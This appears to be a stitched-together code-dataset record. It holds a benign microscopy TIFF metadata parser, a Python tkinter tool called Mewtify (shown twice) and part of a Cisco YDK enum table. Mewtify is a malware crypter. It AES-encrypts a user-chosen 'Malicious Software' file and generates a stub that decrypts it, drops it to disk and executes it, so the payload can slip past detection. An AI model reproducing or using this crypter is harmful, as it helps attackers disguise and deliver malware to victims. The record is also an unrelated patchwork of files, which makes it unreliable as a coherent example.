return datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
class MicroManagerTIFF:
def __init__(self, src_filepath, verbose=True):
self.verbose = verbose
self.src_filepath = src_filepath
self.events = []
self.global_metadata = {'processing_timestamp': timestamp()}
self.open_tiff()
def event_logger(self, message):
if self.verbose:
print('EVENT: %s' % message)
self.events.append({'message': message, 'timestamp': timestamp()})
def save_events(self, dst_filepath):
if not self.events:
return
pd.DataFrame(data=self.events).to_csv(dst_filepath, index=False)
def save_global_metadata(self, dst_filepath):
with open(dst_filepath, 'w') as file:
json.dump(self.global_metadata, file)
def save_mm_metadata(self, dst_filepath):
self.mm_metadata.to_csv(dst_filepath, index=False)
def calc_hash(self):
sha1 = hashlib.sha1()
with open(self.src_filepath, 'rb') as file:
sha1.update(file.read())
hash_value = sha1.hexdigest()
self.global_metadata['sha1_hash'] = hash_value
return hash_value
def open_tiff(self):
self.tiff = tifffile.TiffFile(self.src_filepath)
@staticmethod
def _parse_mm_tag_schema_v1(mm_tag):
metadata = {
'slice_ind': mm_tag['SliceIndex'],
'frame_ind': mm_tag['FrameIndex'],
'channel_ind': mm_tag['ChannelIndex'],
'position_ind': mm_tag['PositionIndex'],
'exposure_time': mm_tag['AndorEMCCD-Exposure'],
'laser_status_405': mm_tag['AndorILE-A-Laser 405-Power Enable'],
'laser_power_405': mm_tag['AndorILE-A-Laser 405-Power Setpoint'],
'laser_status_488': mm_tag['AndorILE-A-Laser 488-Power Enable'],
'laser_power_488': mm_tag['AndorILE-A-Laser 488-Power Setpoint'],
}
return metadata
@staticmethod
def _parse_mm_tag_schema_v2(mm_tag):
metadata = {
'slice_ind': mm_tag['SliceIndex'],
'frame_ind': mm_tag['FrameIndex'],
'channel_ind': mm_tag['ChannelIndex'],
'position_ind': mm_tag['PositionIndex'],
'exposure_time': mm_tag.get('Andor EMCCD-Exposure')['PropVal'],
'laser_status_405': mm_tag.get('Andor ILE-A-Laser 405-Power Enable')['PropVal'],
'laser_power_405': mm_tag.get('Andor ILE-A-Laser 405-Power Setpoint')['PropVal'],
'laser_status_488': mm_tag.get('Andor ILE-A-Laser 488-Power Enable')['PropVal'],
'laser_power_488': mm_tag.get('Andor ILE-A-Laser 488-Power Setpoint')['PropVal'],
}
return metadata
def parse_micromanager_metadata(self):
ij_metadata = None
try:
ij_metadata = self.tiff.pages[0].tags['IJMetadata'].value['Info']
except Exception:
self.event_logger('There was no IJMetadata tag found on the first page')
if ij_metadata is not None:
try:
ij_metadata = json.loads(ij_metadata)
except Exception:
self.event_logger('IJMetadata could not be parsed by json.loads')
mm_metadata_rows = []
for ind, page in enumerate(self.tiff.pages):
mm_metadata_row = {
'page_ind': ind,
'error': False
}
mm_tag = page.tags.get('MicroManagerMetadata')
if not isinstance(mm_tag, tifffile.tifffile.TiffTag):
self.event_logger('There was no MicroManagerMetadata tag found on page %s' % ind)
mm_metadata_row['error'] = True
mm_metadata_rows.append(mm_metadata_row)
continue
try:
page_metadata_v1 = self._parse_mm_tag_schema_v1(mm_tag.value)
except Exception:
page_metadata_v1 = None
try:
page_metadata_v2 = self._parse_mm_tag_schema_v2(mm_tag.value)
except Exception:
page_metadata_v2 = None
page_metadata = {}
mm_metadata_version = None
if page_metadata_v1 is not None:
mm_metadata_version = 'v1'
page_metadata = page_metadata_v1
elif page_metadata_v2 is not None:
mm_metadata_version = 'v2'
page_metadata = page_metadata_v2
else:
mm_metadata_row['error'] = True
self.event_logger('Unable to parse MicroManagerMetadata tag from page %s' % ind)
mm_metadata_rows.append({**mm_metadata_row, **page_metadata})
self.mm_metadata = pd.DataFrame(data=mm_metadata_rows)
self.global_metadata['mm_metadata_version'] = mm_metadata_version
class RawPipelineTIFF(MicroManagerTIFF):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.laser_405 = '405'
self.laser_488 = '488'
def validate_micromanager_metadata(self):
self.has_valid_channel_inds = False
self.has_valid_slice_inds = False
self.safe_to_split_in_half = False
md = self.mm_metadata.copy()
errors = md['error']
md = md.drop(labels='error', axis=1)
parsed_columns = set(md.columns).difference(['page_ind'])
md = md.dropna(how='any', subset=parsed_columns, axis=0)
num_error_rows = errors.sum()
num_dropped_rows = self.mm_metadata.shape[0] - md.shape[0]
if num_dropped_rows != num_error_rows:
self.event_logger(
'%s rows with NAs were dropped but %s rows had errors'
% (num_dropped_rows, num_error_rows)
)
int_columns = ['slice_ind', 'channel_ind']
for column in int_columns:
md[column] = md[column].apply(int)
float_columns = ['laser_power_405', 'laser_power_488', 'exposure_time']
for column in float_columns:
md[column] = md[column].apply(float)
self.channel_inds = None
unique_channel_inds = sorted(md.channel_ind.unique())
if len(unique_channel_inds) == 2:
self.channel_inds = {
self.laser_405: min(unique_channel_inds),
self.laser_488: max(unique_channel_inds),
}
elif set(unique_channel_inds) == set([0, 1, 2]):
self.event_logger('There were three channel inds')
self.channel_inds = {
self.laser_405: 0,
self.laser_488: 1,
}
elif len(unique_channel_inds) == 1:
if np.mod(md.shape[0], 2) == 0:
self.safe_to_split_in_half = True
else:
self.event_logger('There is one channel_ind and an odd number of pages')
else:
self.event_logger('Unexpected number of channel_inds (%s)' % unique_channel_inds)
# if there were valid channel_inds, check for an equal number of pages from each channel
if self.channel_inds is not None:
num_405 = (md.channel_ind == self.channel_inds[self.laser_405]).sum()
num_488 = (md.channel_ind == self.channel_inds[self.laser_488]).sum()
if num_405 == num_488:
self.has_valid_channel_inds = True
else:
self.event_logger(
'Channels have unequal number of slices: %s and %s' % (num_405, num_488)
)
# in each channel, check that slice_ind increments by 1.0
# and that exposure time and laser power are consistent
for channel_ind in unique_channel_inds:
md_channel = md.loc[md.channel_ind == channel_ind]
steps = np.unique(np.diff(md_channel.slice_ind))
# check that slice inds are contiguous
if len(steps) == 1 and steps[0] == 1:
self.has_valid_slice_inds = True
elif len(steps) == 1:
self.event_logger(
'Unexpected slice_ind increment %s for channel_ind %s'
% (steps[0], channel_ind)
)
elif len(steps) > 1:
self.event_logger(
'The slice_inds are not contiguous for channel_ind %s' % channel_ind
)
for column in float_columns:
steps = np.unique(np.diff(md_channel[column]))
if len(steps) > 1 or steps[0] != 0:
self.event_logger(
'Inconsistent values found in column %s for channel_ind %s'
% (column, channel_ind)
)
self.validated_mm_metadata = md
@staticmethod
def tag_and_coerce_metadata(row, tag):
d = {}
for key, val in dict(row).items():
key = '%s_%s' % (key, tag)
try:
val = float(val)
except Exception:
pass
d[key] = val
return d
def split_channels(self):
self.did_split_channels = True
self.stacks = {}
md = self.validated_mm_metadata.copy()
if self.has_valid_channel_inds:
for channel_name in (self.laser_405, self.laser_488):
channel_md = md.loc[md.channel_ind == self.channel_inds[channel_name]]
self.global_metadata.update(
self.tag_and_coerce_metadata(channel_md.iloc[0], tag=channel_name)
)
self.stacks[channel_name] = self.concat_pages(channel_md.page_ind.values)
elif self.safe_to_split_in_half:
n = int(md.shape[0]/2)
self.stacks[self.laser_405] = self.concat_pages(md.iloc[:n].page_ind.values)
self.stacks[self.laser_488] = self.concat_pages(md.iloc[n:].page_ind.values)
else:
self.event_logger('Unable to safely split pages by channel')
self.did_split_channels = False
def concat_pages(self, page_inds):
stack = np.array([self.tiff.pages[ind].asarray() for ind in page_inds])
return stack
def project_stack(self, channel_name, axis, dst_filepath=None):
axis_inds = {'x': 1, 'y': 2, 'z': 0}
if axis not in axis_inds.keys():
raise ValueError("Axis must be one of 'x', 'y', or 'z'")
axis_ind = axis_inds[axis]
try:
proj = self.stacks[channel_name].max(axis=axis_ind)
minmax = {
'min_intensity': int(proj.min()),
'max_intensity': int(proj.max()),
}
self.global_metadata.update(self.tag_and_coerce_metadata(minmax, tag=channel_name))
if dst_filepath is not None:
tifffile.imsave(dst_filepath, proj)
except Exception:
self.event_logger(
'An error occured while %s-projecting the %s channel' % (axis, channel_name)
)
def calculate_z_profiles(self, channel):
stack = self.stacks[channel]
return {
'min': np.array([zslice.min() for zslice in stack]).astype(int),
'max': np.array([zslice.max() for zslice in stack]).astype(int),
'mean': np.array([zslice.mean() for zslice in stack]).astype(int),
'p9999': np.array([np.percentile(zslice, 99.99) for zslice in stack]).astype(int),
}
@staticmethod
def find_cell_layer(stack):
# z-profile of the mean intensity in the Hoechst channel
raw_profile = np.array([zslice.mean() for zslice in stack]).astype(float)
profile = raw_profile - raw_profile.mean()
profile[profile < 0] = 0
x = np.arange(len(profile))
center_of_mass = (profile * x).sum()/profile.sum()
return center_of_mass, raw_profile
def align_cell_layer(
self, cell_layer_bottom, cell_layer_top, step_size, bottom_wiggle_room=0
):
stacks = {}
result = {}
stack_405 = self.stacks[self.laser_405].copy()
stack_488 = self.stacks[self.laser_488].copy()
# hard-coded chromatic aberration offset in microns
# this is an empirically estimated median offset,
# obtained by inspecting z-stacks from nucleus-localized targets
chromatic_aberration_offset = 1.0
offset_ind = int(chromatic_aberration_offset/step_size)
stack_405 = stack_405[:-offset_ind, :, :]
stack_488 = stack_488[offset_ind:, :, :]
# estimate the cell layer center and round it the nearest z-slice
cell_layer_center, _ = self.find_cell_layer(stack_405)
cell_layer_center = np.round(cell_layer_center)
# absolute position, in number of z-slices, of the top and bottom of the cell layer
bottom_ind = int(np.floor(cell_layer_center + cell_layer_bottom/step_size))
top_ind = int(np.ceil(cell_layer_center + cell_layer_top/step_size))
# log some parameters (for debugging, mostly)
result['padded'] = False
result['stack_shape'] = stack_405.shape
result['crop_window'] = [bottom_ind, top_ind]
result['cell_layer_center'] = cell_layer_center
result['chromatic_aberration_offset'] = offset_ind
pad_depth = None
if bottom_ind < 0:
if abs(bottom_ind) <= np.round(bottom_wiggle_room/step_size):
pad_depth = abs(bottom_ind)
bottom_ind = 0
else:
result['error'] = 'The cell layer center was too close to the bottom of the stack'
return stacks, result
if top_ind >= stack_405.shape[0]:
result['error'] = 'The cell layer center was too close to the top of the stack'
return stacks, result
stack_405 = stack_405[bottom_ind:top_ind, :, :]
stack_488 = stack_488[bottom_ind:top_ind, :, :]
# pad the bottom of the stack if necessary
if pad_depth:
result['padded'] = True
result['pad_depth'] = pad_depth
padding = np.zeros((pad_depth, *stack_405.shape[1:]), dtype=stack_405.dtype)
stack_405 = np.concatenate((padding, stack_405), axis=0)
stack_488 = np.concatenate((padding, stack_488), axis=0)
stacks = {'405': stack_405, '488': stack_488}
return stacks, result
| true
| true
|
f7050ebecfade791d4ef5451036aca5787d01b52
| 3,395
|
py
|
Python
|
venv/venv/Scripts/Mewtify4Windows.py
|
FullstackAcademy/Mewtify
|
f6b23a6cf3da3f57bd27256e88786cc8c87e851d
|
[
"MIT"
] | null | null | null |
venv/venv/Scripts/Mewtify4Windows.py
|
FullstackAcademy/Mewtify
|
f6b23a6cf3da3f57bd27256e88786cc8c87e851d
|
[
"MIT"
] | null | null | null |
venv/venv/Scripts/Mewtify4Windows.py
|
FullstackAcademy/Mewtify
|
f6b23a6cf3da3f57bd27256e88786cc8c87e851d
|
[
"MIT"
] | 1
|
2021-12-17T01:06:42.000Z
|
2021-12-17T01:06:42.000Z
|
#!/usr/bin/env python3
import tkinter as tk
import binascii, pyaes, sys, base64, os.path, os
from tkinter import *
from pathlib import Path
from tkinter.font import Font
from tkinter.filedialog import askopenfilename
import secrets
import string
def main():
global entry3
input2 = entry3.get()
# Open file
file_name = malwarename # Malware path
new_file_name = input2 # Path to drop file
file = open(file_name, "rb")
file_data = file.read()
file.close()
# Crypt file data (Using AES)
key = bytearray(ran_string, 'UTF-8') # 16 bytes key - change for your key
aes = pyaes.AESModeOfOperationCTR(key)
crypto_data = aes.encrypt(file_data)
# Create Stub in Python File
stub = "import pyaes\n"
stub += "import sys\n"
stub += "crypto_data_hex = " + str(crypto_data) + "\n"
stub += "key = " + str(key) + "\n"
stub += "new_file_name = \"" + str(new_file_name) + "\"\n"
stub += "aes = pyaes.AESModeOfOperationCTR(key)\n"
stub += "crypto_data = crypto_data_hex\n"
stub += "decrypt_data = aes.decrypt(crypto_data)\n"
# Save file
stub += "new_file = open(new_file_name, 'wb')\n"
stub += "new_file.write(decrypt_data)\n"
stub += "new_file.close()\n"
# Execute file
stub += "import subprocess\n"
stub += 'proc = subprocess.Popen("python "+new_file_name, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n'
# Save the Stub
stub_name = str(input2)
stub_file = open(stub_name, "w")
stub_file.write(stub)
stub_file.close()
return
def fname():
global malwarename
malwarename = askopenfilename()
return malwarename
N=16
ran_string = ''.join(secrets.choice(string.ascii_uppercase + string.digits)
for i in range(N))
# GUI Dimensions
HEIGHT = 500
WIDTH = 700
root = tk.Tk()
# GUI NAME AND SIZE
root.title("MEWTIFY")
canvas = tk.Canvas(root, height=HEIGHT, width=WIDTH)
canvas.pack()
background_image = tk.PhotoImage(file='yaj.png')
background_label = tk.Label(root, image=background_image)
background_label.image= background_image
background_label.place(relwidth=1,relheight=1)
root.resizable(False, False)
# GUI HEADER
frame = tk.Frame(root, bg='#80C1FF', bd=5)
frame.place(relx=0.5, rely=0.05, relwidth=1, relheight=0.2, anchor='n')
label = tk.Label(frame, text="Welcome to Mewtify!", font=("-weight bold", 27), bg='#80C1FF')
label.place(relx=0.3, rely=0, relwidth=.5, relheight=1)
# INPUT 1
label2 = tk.Label(root, text="Malicious Software with full path:", anchor='w', font=15)
label2.place(relx=0, rely=0.35, relwidth=0.4, relheight=0.10)
filebutton = tk.Button(root, text="Select", font=40, command=fname)
filebutton.place(relx=.5, rely=0.35, relwidth=0.45, relheight=0.09)
# INPUT2
label3 = tk.Label(root, text="Name of Mutated Software:", anchor='w', font=15)
label3.place(relx=0, rely=0.5, relwidth=0.4, relheight=0.10)
entry3 = tk.Entry(root, font=40)
entry3.place(relx=.5, rely=0.5, relwidth=0.45, relheight=0.09)
entry3.focus_set()
# button mashing
button = tk.Button(root, text="MEWTIFY", bg="purple", font=40, command=main)
button.place(relx=0.3, rely=0.8, relwidth=0.45, relheight=0.15)
button1=tk.Button(root, text="click to exit", bg= "red", font =10,command=root.destroy)
button1.place(relx=.8, rely=0.9, relwidth=0.15, relheight=0.05)
root.mainloop()
| 33.613861
| 147
| 0.68218
|
import tkinter as tk
import binascii, pyaes, sys, base64, os.path, os
from tkinter import *
from pathlib import Path
from tkinter.font import Font
from tkinter.filedialog import askopenfilename
import secrets
import string
def main():
global entry3
input2 = entry3.get()
file_name = malwarename
new_file_name = input2
file = open(file_name, "rb")
file_data = file.read()
file.close()
key = bytearray(ran_string, 'UTF-8')
aes = pyaes.AESModeOfOperationCTR(key)
crypto_data = aes.encrypt(file_data)
stub = "import pyaes\n"
stub += "import sys\n"
stub += "crypto_data_hex = " + str(crypto_data) + "\n"
stub += "key = " + str(key) + "\n"
stub += "new_file_name = \"" + str(new_file_name) + "\"\n"
stub += "aes = pyaes.AESModeOfOperationCTR(key)\n"
stub += "crypto_data = crypto_data_hex\n"
stub += "decrypt_data = aes.decrypt(crypto_data)\n"
stub += "new_file = open(new_file_name, 'wb')\n"
stub += "new_file.write(decrypt_data)\n"
stub += "new_file.close()\n"
stub += "import subprocess\n"
stub += 'proc = subprocess.Popen("python "+new_file_name, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n'
stub_name = str(input2)
stub_file = open(stub_name, "w")
stub_file.write(stub)
stub_file.close()
return
def fname():
global malwarename
malwarename = askopenfilename()
return malwarename
N=16
ran_string = ''.join(secrets.choice(string.ascii_uppercase + string.digits)
for i in range(N))
HEIGHT = 500
WIDTH = 700
root = tk.Tk()
root.title("MEWTIFY")
canvas = tk.Canvas(root, height=HEIGHT, width=WIDTH)
canvas.pack()
background_image = tk.PhotoImage(file='yaj.png')
background_label = tk.Label(root, image=background_image)
background_label.image= background_image
background_label.place(relwidth=1,relheight=1)
root.resizable(False, False)
frame = tk.Frame(root, bg='#80C1FF', bd=5)
frame.place(relx=0.5, rely=0.05, relwidth=1, relheight=0.2, anchor='n')
label = tk.Label(frame, text="Welcome to Mewtify!", font=("-weight bold", 27), bg='#80C1FF')
label.place(relx=0.3, rely=0, relwidth=.5, relheight=1)
label2 = tk.Label(root, text="Malicious Software with full path:", anchor='w', font=15)
label2.place(relx=0, rely=0.35, relwidth=0.4, relheight=0.10)
filebutton = tk.Button(root, text="Select", font=40, command=fname)
filebutton.place(relx=.5, rely=0.35, relwidth=0.45, relheight=0.09)
label3 = tk.Label(root, text="Name of Mutated Software:", anchor='w', font=15)
label3.place(relx=0, rely=0.5, relwidth=0.4, relheight=0.10)
entry3 = tk.Entry(root, font=40)
entry3.place(relx=.5, rely=0.5, relwidth=0.45, relheight=0.09)
entry3.focus_set()
button = tk.Button(root, text="MEWTIFY", bg="purple", font=40, command=main)
button.place(relx=0.3, rely=0.8, relwidth=0.45, relheight=0.15)
button1=tk.Button(root, text="click to exit", bg= "red", font =10,command=root.destroy)
button1.place(relx=.8, rely=0.9, relwidth=0.15, relheight=0.05)
root.mainloop()
| true
| true
|
f7050ec21fb698ea4268b24c71bc79f1318a524a
| 436,547
|
py
|
Python
|
cisco-ios-xr/ydk/models/cisco_ios_xr/_meta/_Cisco_IOS_XR_l2vpn_cfg.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/_meta/_Cisco_IOS_XR_l2vpn_cfg.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
cisco-ios-xr/ydk/models/cisco_ios_xr/_meta/_Cisco_IOS_XR_l2vpn_cfg.py
|
tkamata-test/ydk-py
|
b637e7853a8edbbd31fbc05afa3aa4110b31c5f9
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'FlowLabelTlvCodeEnum' : _MetaInfoEnum('FlowLabelTlvCodeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'17':'Y_17',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BackupDisableEnum' : _MetaInfoEnum('BackupDisableEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'never':'never',
'delay':'delay',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetFormatEnum' : _MetaInfoEnum('BgpRouteTargetFormatEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'two-byte-as':'two_byte_as',
'four-byte-as':'four_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'LoadBalanceEnum' : _MetaInfoEnum('LoadBalanceEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'source-dest-mac':'source_dest_mac',
'source-dest-ip':'source_dest_ip',
'pseudowire-label':'pseudowire_label',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterworkingEnum' : _MetaInfoEnum('InterworkingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'ethernet':'ethernet',
'ipv4':'ipv4',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PwSwitchingPointTlvEnum' : _MetaInfoEnum('PwSwitchingPointTlvEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'hide':'hide',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacAgingEnum' : _MetaInfoEnum('MacAgingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'absolute':'absolute',
'inactivity':'inactivity',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2Tpv3SequencingEnum' : _MetaInfoEnum('L2Tpv3SequencingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'off':'off',
'both':'both',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpPort1Enum' : _MetaInfoEnum('ErpPort1Enum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'port0':'port0',
'port1':'port1',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterfaceProfileEnum' : _MetaInfoEnum('InterfaceProfileEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'snoop':'snoop',
'dhcp-protocol':'dhcp_protocol',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2EncapsulationEnum' : _MetaInfoEnum('L2EncapsulationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'vlan':'vlan',
'ethernet':'ethernet',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'InterfaceTrafficFloodEnum' : _MetaInfoEnum('InterfaceTrafficFloodEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'traffic-flooding':'traffic_flooding',
'enable-flooding':'enable_flooding',
'disable-flooding':'disable_flooding',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnLoggingEnum' : _MetaInfoEnum('L2VpnLoggingEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetRoleEnum' : _MetaInfoEnum('BgpRouteTargetRoleEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'both':'both',
'import':'import_',
'export':'export',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ErpPortEnum' : _MetaInfoEnum('ErpPortEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'virtual':'virtual',
'interface':'interface',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacWithdrawBehaviorEnum' : _MetaInfoEnum('MacWithdrawBehaviorEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'legacy':'legacy',
'optimized':'optimized',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2TpCookieSizeEnum' : _MetaInfoEnum('L2TpCookieSizeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'zero':'zero',
'four':'four',
'eight':'eight',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'StormControlEnum' : _MetaInfoEnum('StormControlEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'unicast':'unicast',
'multicast':'multicast',
'broadcast':'broadcast',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2TpSignalingProtocolEnum' : _MetaInfoEnum('L2TpSignalingProtocolEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'l2tpv3':'l2tpv3',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'RplRoleEnum' : _MetaInfoEnum('RplRoleEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'owner':'owner',
'neighbor':'neighbor',
'next-neighbor':'next_neighbor',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacLimitActionEnum' : _MetaInfoEnum('MacLimitActionEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'flood':'flood',
'no-flood':'no_flood',
'shutdown':'shutdown',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'TypeOfServiceModeEnum' : _MetaInfoEnum('TypeOfServiceModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'reflect':'reflect',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacNotificationEnum' : _MetaInfoEnum('MacNotificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'no-notif':'no_notif',
'syslog':'syslog',
'trap':'trap',
'syslog-snmp':'syslog_snmp',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnVerificationEnum' : _MetaInfoEnum('L2VpnVerificationEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'LdpVplsIdEnum' : _MetaInfoEnum('LdpVplsIdEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'two-byte-as':'two_byte_as',
'ipv4-address':'ipv4_address',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MacLearnEnum' : _MetaInfoEnum('MacLearnEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'default-learning':'default_learning',
'enable-learning':'enable_learning',
'disable-learning':'disable_learning',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PortDownFlushEnum' : _MetaInfoEnum('PortDownFlushEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'port-down-flush':'port_down_flush',
'enable-port-down-flush':'enable_port_down_flush',
'disable-port-down-flush':'disable_port_down_flush',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'L2VpnCapabilityModeEnum' : _MetaInfoEnum('L2VpnCapabilityModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'high-mode':'high_mode',
'single-mode':'single_mode',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'MplsSignalingProtocolEnum' : _MetaInfoEnum('MplsSignalingProtocolEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'none':'none',
'ldp':'ldp',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BgpRouteTargetEnum' : _MetaInfoEnum('BgpRouteTargetEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'no-stitching':'no_stitching',
'stitching':'stitching',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'ControlWordEnum' : _MetaInfoEnum('ControlWordEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'enable':'enable',
'disable':'disable',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'PreferredPathEnum' : _MetaInfoEnum('PreferredPathEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'te-tunnel':'te_tunnel',
'ip-tunnel':'ip_tunnel',
'tp-tunnel':'tp_tunnel',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
'BridgeDomainTransportModeEnum' : _MetaInfoEnum('BridgeDomainTransportModeEnum', 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg',
{
'vlan-passthrough':'vlan_passthrough',
}, 'Cisco-IOS-XR-l2vpn-cfg', _yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg']),
